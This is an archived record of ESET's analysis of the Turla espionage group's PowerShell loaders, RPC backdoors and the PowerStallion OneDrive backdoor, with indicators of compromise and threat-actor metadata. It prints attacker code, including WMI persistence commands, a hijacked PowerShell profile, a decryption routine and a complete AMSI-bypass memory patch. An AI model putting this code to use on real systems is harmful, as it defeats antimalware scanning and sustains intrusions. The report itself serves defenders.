{
	"id": "57b19683-6d7f-49a8-b685-59ee166f60da",
	"created_at": "2026-04-06T00:13:54.300429Z",
	"updated_at": "2026-04-10T03:33:36.035821Z",
	"deleted_at": null,
	"sha1_hash": "4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c",
	"title": "A dive into Turla PowerShell usage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 449702,
	"plain_text": "A dive into Turla PowerShell usage\r\nBy Matthieu Faou and Romain Dumont\r\nArchived: 2026-04-05 17:19:22 UTC\r\nTurla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound\r\ndetection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and\r\nexecution of malware executables and libraries. This allows them to bypass detection that can trigger when a\r\nmalicious executable is dropped on disk.\r\nTurla is believed to have been operating since at least 2008, when it successfully breached the US military. More\r\nrecently, it was involved in major attacks against the German Foreign Office and the French military.\r\nThis is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing\r\nsecurity products. In 2018, Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was\r\nbased on the open-source project Posh-SecMod. However, it was quite buggy and often led to crashes.\r\nAfter a few months, Turla has improved these scripts and is now using them to load a wide range of custom\r\nmalware from its traditional arsenal.\r\nThe victims are quite usual for Turla. We identified several diplomatic entities in Eastern Europe that were\r\ncompromised using these scripts. However, it is likely the same scripts are used more globally against many\r\ntraditional Turla targets in Western Europe and the Middle East. Thus, this blogpost aims to help defenders\r\ncounter these PowerShell scripts. 
We will also present various payloads, including an RPC-based backdoor and a\r\nbackdoor leveraging OneDrive as its Command and Control (C\u0026C) server.\r\nPowerShell Loader\r\nThe PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded\r\nexecutable or library.\r\nPersistence\r\nThe PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory\r\nonly the embedded executables. We have seen Turla operators use two persistence methods:\r\nA Windows Management Instrumentation (WMI) event subscription\r\nAlteration of the PowerShell profile (profile.ps1 file).\r\nWindows Management Instrumentation\r\nIn the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply\r\ncommand lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 1 of 13\n\nWindows registry. 
Figure 1 shows how the persistence is established.\r\nGet-WmiObject CommandLineEventConsumer -Namespace root\\subscription -filter \"name='Syslog Consumer'\" | Remove-W\r\n$NLP35gh = Set-WmiInstance -Namespace \"root\\subscription\" -Class 'CommandLineEventConsumer' -Arguments @{name='S\r\nGet-WmiObject __eventFilter -namespace root\\subscription -filter \"name='Log Adapter Filter'\"| Remove-WmiObject;\r\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -match 'Log Adapt\r\n$IT825cd = \"SELECT * FROM __instanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInsta\r\n$VQI79dcf = Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments @{name='Log Adapter Fil\r\nSet-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$VQI79dcf;Cons\r\n \r\nGet-WmiObject __eventFilter -namespace root\\subscription -filter \"name='AD Bridge Filter'\"| Remove-WmiObject;\r\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -match 'AD Bridge\r\n$IT825cd = \"SELECT * FROM __instanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedDat\r\n$VQI79dcf = Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments @{name='AD Bridge Filte\r\nSet-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$VQI79dcf;Cons\r\nFigure 1. Persistence using WMI\r\nThese events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The\r\nvariable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows\r\nRegistry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the\r\npayload.\r\n[System.Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(\"\u003cbase64-encoded password and salt\"\u003e)) | ie\r\nFigure 2. 
WMI consumer PowerShell command\r\nFinally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a\r\ndifferent registry location per organization. Thus, it is not a useful indicator to detect similar intrusions.\r\nProfile.ps1\r\nIn the latter case, attackers alter the PowerShell profile. According to the Microsoft documentation:\r\nA PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to\r\ncustomize the environment. You can add commands, aliases, functions, variables, snap-ins, modules, and\r\nPowerShell drives.\r\nFigure 3 shows a PowerShell profile modified by Turla.\r\ntry\r\n{\r\n $SystemProc = (Get-WmiObject 'Win32_Process' | ?{$_.ProcessId -eq $PID} | % {Invoke-WmiMethod -InputObject\r\nif (\"$SystemProc\" -ne \"\")\r\n {\r\n $([Convert]::ToBase64String($([Text.Encoding]::ASCII.GetBytes(\"\u003cm\u003e$([DateTime]::Now.ToString('G')): STARTE\r\n [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\"IABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbg\r\n kill $PID;\r\n }\r\n}\r\ncatch{$([Convert]::ToBase64String($([Text.Encoding]::ASCII.GetBytes(\"\u003cm\u003e$([DateTime]::Now.ToString('G')): $_ \u003c/m\r\nFigure 3. Hijacked profile.ps1 file\r\nThe base64-encoded PowerShell command is very similar to the one used in the WMI consumers.\r\nDecryption\r\nThe payload stored in the Windows registry is another PowerShell script. It is generated using the open-source\r\nscript Out-EncryptedScript.ps1 from the penetration-testing framework PowerSploit. 
In addition, the variable\r\nnames are randomized to obfuscate the script, as shown in Figure 4.\r\n$GSP540cd = \"\u003cbase64 encoded + encrypted payload\u003e\";\r\n$RS99ggf = $XZ228hha.GetBytes(\"PINGQXOMQFTZGDZX\");\r\n$STD33abh = [Convert]::FromBase64String($GSP540cd);\r\n$SB49gje = New-Object System.Security.Cryptography.PasswordDeriveBytes($IY51aab, $XZ228hha.GetBytes($CBI61aeb),\r\n[Byte[]]$XYW18ja = $SB49gje.GetBytes(16);\r\n$EN594ca = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;\r\n$EN594ca.Mode = [System.Security.Cryptography.CipherMode]::CBC;\r\n[Byte[]]$ID796ea = New-Object Byte[]($STD33abh.Length);\r\n$ZQD772bf = $EN594ca.CreateDecryptor($XYW18ja, $RS99ggf);\r\n$DCR12ffg = New-Object System.IO.MemoryStream($STD33abh, $True);\r\n$WG731ff = New-Object System.Security.Cryptography.CryptoStream($DCR12ffg, $ZQD772bf, [System.Security.Cryptogra\r\n$XBD387bb = $WG731ff.Read($ID796ea, 0, $ID796ea.Length);\r\n$OQ09hd = [YR300hf]::IWM01jdg($ID796ea);\r\n$DCR12ffg.Close();\r\n$WG731ff.Close();\r\n$EN594ca.Clear();\r\nreturn $XZ228hha.GetString($OQ09hd,0,$OQ09hd.Length);\r\nFigure 4. Decryption routine\r\nThe payload is decrypted using the 3DES algorithm. The Initialization Vector, PINGQXOMQFTZGDZX in this\r\nexample, is different for each sample. The key and the salt are also different for each script and are not stored in\r\nthe script, but only in the WMI filter or in the profile.ps1 file.\r\nPE loader\r\nThe payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. 
The executable is hardcoded in the script and is\r\nloaded directly into the memory of a randomly chosen process that is already running on the system.\r\nIn some samples, the attackers specify a list of executables that the binary should not be injected into, as shown in\r\nFigure 5.\r\n$IgnoreNames = @(\"smss.exe\",\"csrss.exe\",\"wininit.exe\",\"winlogon.exe\",\"lsass.exe\",\"lsm.exe\",\"svchost.exe\",\"avp.e\r\nFigure 5. Example list of excluded processes\r\nIt is interesting to note that the names avp.exe, avpsus.exe, klnagent.exe and vapm.exe refer to Kaspersky Labs\r\nexecutables. It seems that Turla operators really want to avoid injecting their malware into Kaspersky software.\r\nAMSI bypass\r\nIn some samples deployed since March 2019, Turla developers modified their PowerShell scripts in order to\r\nbypass the Antimalware Scan Interface (AMSI). This is an interface allowing any Windows application to\r\nintegrate with the installed antimalware product. It is particularly useful for PowerShell and macros.\r\nThey did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and\r\nFall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the\r\nlibrary amsi.dll.\r\nThe PowerShell script loads a .NET executable to retrieve the address of AmsiScanBuffer. Then, it calls\r\nVirtualProtect to allow writing at the retrieved address.\r\nFinally, the patching is done directly in the PowerShell script as shown in Figure 6. It modifies the beginning of\r\nAmsiScanBuffer to always return 1 (AMSI_RESULT_NOT_DETECTED). 
Thus, the antimalware product will\r\nnot receive the buffer, which prevents any scanning.\r\n$ptr = [Win32]::FindAmsiFun();\r\nif($ptr -eq 0)\r\n{\r\nWrite-Host \"protection not found\"\r\n}\r\nelse\r\n{\r\nif([IntPtr]::size -eq 4)\r\n{\r\nWrite-Host \"x32 protection detected\"\r\n$buf = New-Object Byte[] 7\r\n$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18\r\n$c = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)\r\n}\r\nelse\r\n{\r\nWrite-Host \"x64 protection detected\"\r\n$buf = New-Object Byte[] 6\r\n$buf[0] = 0xb8; $buf[1] = 0x01; $buf[2] = 0x00; $buf[3] = 0x00; $buf[4] = 0x00; $buf[5] = 0xc3\r\n$c = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 6)\r\n}\r\n}\r\nFigure 6. Patching of AmsiScanBuffer function\r\nPayloads\r\nThe PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC\r\nBackdoor and a PowerShell backdoor.\r\nRPC backdoor\r\nTurla has developed a whole set of backdoors relying on the RPC protocol. These backdoors are used to perform\r\nlateral movement and take control of other machines in the local network without relying on an external C\u0026C\r\nserver.\r\nThe features implemented are quite basic: file upload, file download and command execution via cmd.exe or\r\nPowerShell. However, the malware also supports the addition of plugins.\r\nThis RPC backdoor is split into two components: a server and a client. An operator will use the client component\r\nto execute commands on another machine where the server component exists, as summarized in Figure 7.\r\nFigure 7. RPC backdoor usage\r\nFor instance, the sample identified by the following SHA-1 hash\r\nEC54EF8D79BF30B63C5249AF7A8A3C652595B923 is a client version. 
This component opens the named pipe\r\n\\\\pipe\\\\atctl with the protocol sequence being “ncacn_np” via the RpcStringBindingComposeW function. The\r\nsample can then send commands by calling the NdrClientCall2 function. The exported procedure HandlerW ,\r\nresponsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or\r\ntry to steal another’s process token just for the execution of a command.\r\nIts server counterpart does the heavy lifting and implements the different commands. It first checks if the registry\r\nkey value HKLM\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes contains\r\n“atctl”. If so, the server sets the security descriptor on the pipe object to \"S:(ML;;NW;;;S-1-16-0)\" via the\r\nSetSecurityInfo function. This will make the pipe available to everyone (untrusted/anonymous integrity level).\r\nThe following image shows the corresponding MIDL stub descriptor and the similar syntax and interface ID.\r\nFigure 8. RPC backdoor client’s MIDL on the left, server's on the right\r\nAs mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for\r\nfiles matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart\r\nis called. Among the various plugins we have located so far, one is able to steal recent files and files from USB\r\nthumb drives.\r\nMany variants of this RPC backdoor are used in the wild. 
Among them, we have seen local proxies (using\r\nupnprpc as the endpoint and ncalrpc as the protocol sequence) and newer versions embedding PowerShellRunner\r\nto run scripts directly without using powershell.exe.\r\nRPC Spoof Server\r\nDuring our research, we also discovered a portable executable with the embedded PDB\r\npath C:\\Users\\Devel\\source\\repos\\RPCSpoofer\\x64\\Release_Win2016_10\\RPCSpoofServerInstall.pdb (SHA-1:\r\n9D1C563E5228B2572F5CA14F0EC33CA0DEDA3D57).\r\nThe main purpose of this utility is to retrieve the RPC configuration of a process that has registered an interface.\r\nIn order to find that kind of process, it iterates through the TCP table (via the GetTcpTable2 function) until it\r\neither finds the PID of the process that has opened a specific port, or retrieves the PID of the process that has\r\nopened a specific named pipe. Once this PID is found, this utility reads the remote process’ memory and tries to\r\nretrieve the registered RPC interface. The code for this, seen in Figure 9, seems ripped from this Github\r\nrepository.\r\nFigure 9. Snippet of code searching for the .data section of rpcrt4.dll in a remote process (Hex-Rays screenshot)\r\nAt first we were unsure how the retrieved information was used, but then another sample (SHA-1:\r\nB948E25D061039D64115CFDE74D2FF4372E83765) helped us understand. As shown in Figure 10, this sample\r\nretrieves the RPC interface, unsets the RPC_IF_ALLOW_SECURE_ONLY flag, and patches the “dispatch\r\ntable” in memory using the WriteProcessMemory function. Those operations would allow the sample to add its\r\nRPC functions to an already existing RPC interface. We believe it is stealthier to re-use an existing RPC interface\r\nthan to create a custom one.\r\nFigure 10. 
Snippet of code retrieving the RPC dispatch table of the current process (Hex-Rays screenshot)\r\nPowerStallion\r\nPowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as\r\nits C\u0026C server. The credentials are hardcoded at the beginning of the script, as shown in Figure 11.\r\nFigure 11. OneDrive credentials in PowerStallion script\r\nIt is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor\r\nand in LightNeuron. They also used the name of a real employee of the targeted organization in the email address.\r\nThe script then uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12,\r\nif a command is available. This backdoor can only execute additional PowerShell scripts. It writes the command\r\nresults in another OneDrive subfolder and encrypts them with the XOR key 0xAA.\r\nFigure 12. Main loop of the PowerStallion backdoor\r\nAnother interesting artefact is that the script modifies the modification, access and creation (MAC) times of the\r\nlocal log file to match the times of a legitimate file – desktop.ini in that example, as shown in Figure 13.\r\nFigure 13. Modification of MAC times of the local log file\r\nWe believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are\r\ncleaned and operators can no longer access the compromised computers. 
We have seen operators use this\r\nbackdoor for the following purposes:\r\nMonitoring antimalware logs.\r\nMonitoring the Windows process list.\r\nInstalling ComRAT version 4, one of the Turla second-stage backdoors.\r\nConclusion\r\nIn a 2018 blogpost, we predicted that Turla would use more and more generic tools. This new research confirms\r\nour forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to\r\nconduct intrusions.\r\nHowever, this does not prevent attributing such attacks to Turla. Attackers tend to configure or modify those open-source tools to better suit their needs. Thus, it is still possible to separate different clusters of activity.\r\nFinally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads\r\ndelivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our\r\nrecent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom\r\nmalware.\r\nWe will continue monitoring new Turla activities and will publish relevant information on our blog. For any\r\ninquiries, contact us at threatintel@eset.com. 
Indicators of Compromise can also be found on our GitHub.\r\nIndicators of Compromise (IoCs)\r\nHashes\r\nSHA-1 hash | Description | ESET detection name\r\n50C0BF9479EFC93FA9CF1AA99BDCA923273B71A1 | PowerShell loader with encrypted payload | PowerShell/Turla.T\r\nEC54EF8D79BF30B63C5249AF7A8A3C652595B923 | RPC backdoor (client) | Win64/Turla.BQ\r\n9CDF6D5878FC3AECF10761FD72371A2877F270D0 | RPC backdoor (server) | Win64/Turla.BQ\r\nD3DF3F32716042404798E3E9D691ACED2F78BDD5 | File exfiltration RPC plugin | Win32/Turla.BZ\r\n9D1C563E5228B2572F5CA14F0EC33CA0DEDA3D57 | RPCSpoofServerInstaller | Win64/Turla.BS\r\nB948E25D061039D64115CFDE74D2FF4372E83765 | RPC interface patcher | Win64/Turla.BR\r\nFilenames\r\nRPC components\r\n%PUBLIC%\\iCore.dat (log file, one-byte XOR 0x55)\r\n\\\\pipe\\\\atctl (named pipe)\r\nPowerStallion\r\nmsctx.ps1\r\nC:\\Users\\Public\\Documents\\desktop.db\r\nRegistry keys\r\nRPC components\r\nHKLM\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes contains\r\natctl\r\nMITRE ATT\u0026CK techniques\r\nTactic | ID | Name | Description\r\nExecution | T1086 | PowerShell | The loaders are written in PowerShell. Some RPC components can execute PowerShell commands.\r\nPersistence | T1084 | Windows Management Instrumentation Event Subscription | The PowerShell loaders use WMI for persistence.\r\nDefense Evasion | T1027 | Obfuscated Files or Information | The RPC backdoor and PowerStallion encrypt the log file.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The PowerShell loaders decrypt the embedded payload.\r\nDefense Evasion | T1055 | Process Injection | The PowerShell loaders inject the payload into a remote process.\r\nDefense Evasion | T1099 | Timestomp | PowerStallion modifies the timestamps of its log file.\r\nDiscovery | T1083 | File and Directory Discovery | The RPC plugin gathers file and directory information.\r\nDiscovery | T1120 | Peripheral Device Discovery | The RPC plugin monitors USB drives.\r\nDiscovery | T1012 | Query Registry | The server component of the RPC backdoor queries the registry for NullSessionPipes.\r\nDiscovery | T1057 | Process Discovery | PowerStallion sends the list of running processes.\r\nCollection | T1005 | Data from Local System | The RPC plugin collects recent files from the local file system.\r\nCollection | T1025 | Data from Removable Media | The RPC plugin collects files from USB drives.\r\nCommand and Control | T1071 | Standard Application Layer Protocol | The RPC backdoor uses RPC and PowerStallion uses OneDrive via SMB.\r\nExfiltration | T1041 | Exfiltration Over Command and Control Channel | PowerStallion exfiltrates information through the C\u0026C channel.\r\nSource: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/"
	],
	"report_names": [
		"turla-powershell-usage"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434434,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.pdf",
		"text": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.txt",
		"img": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.jpg"
	}
}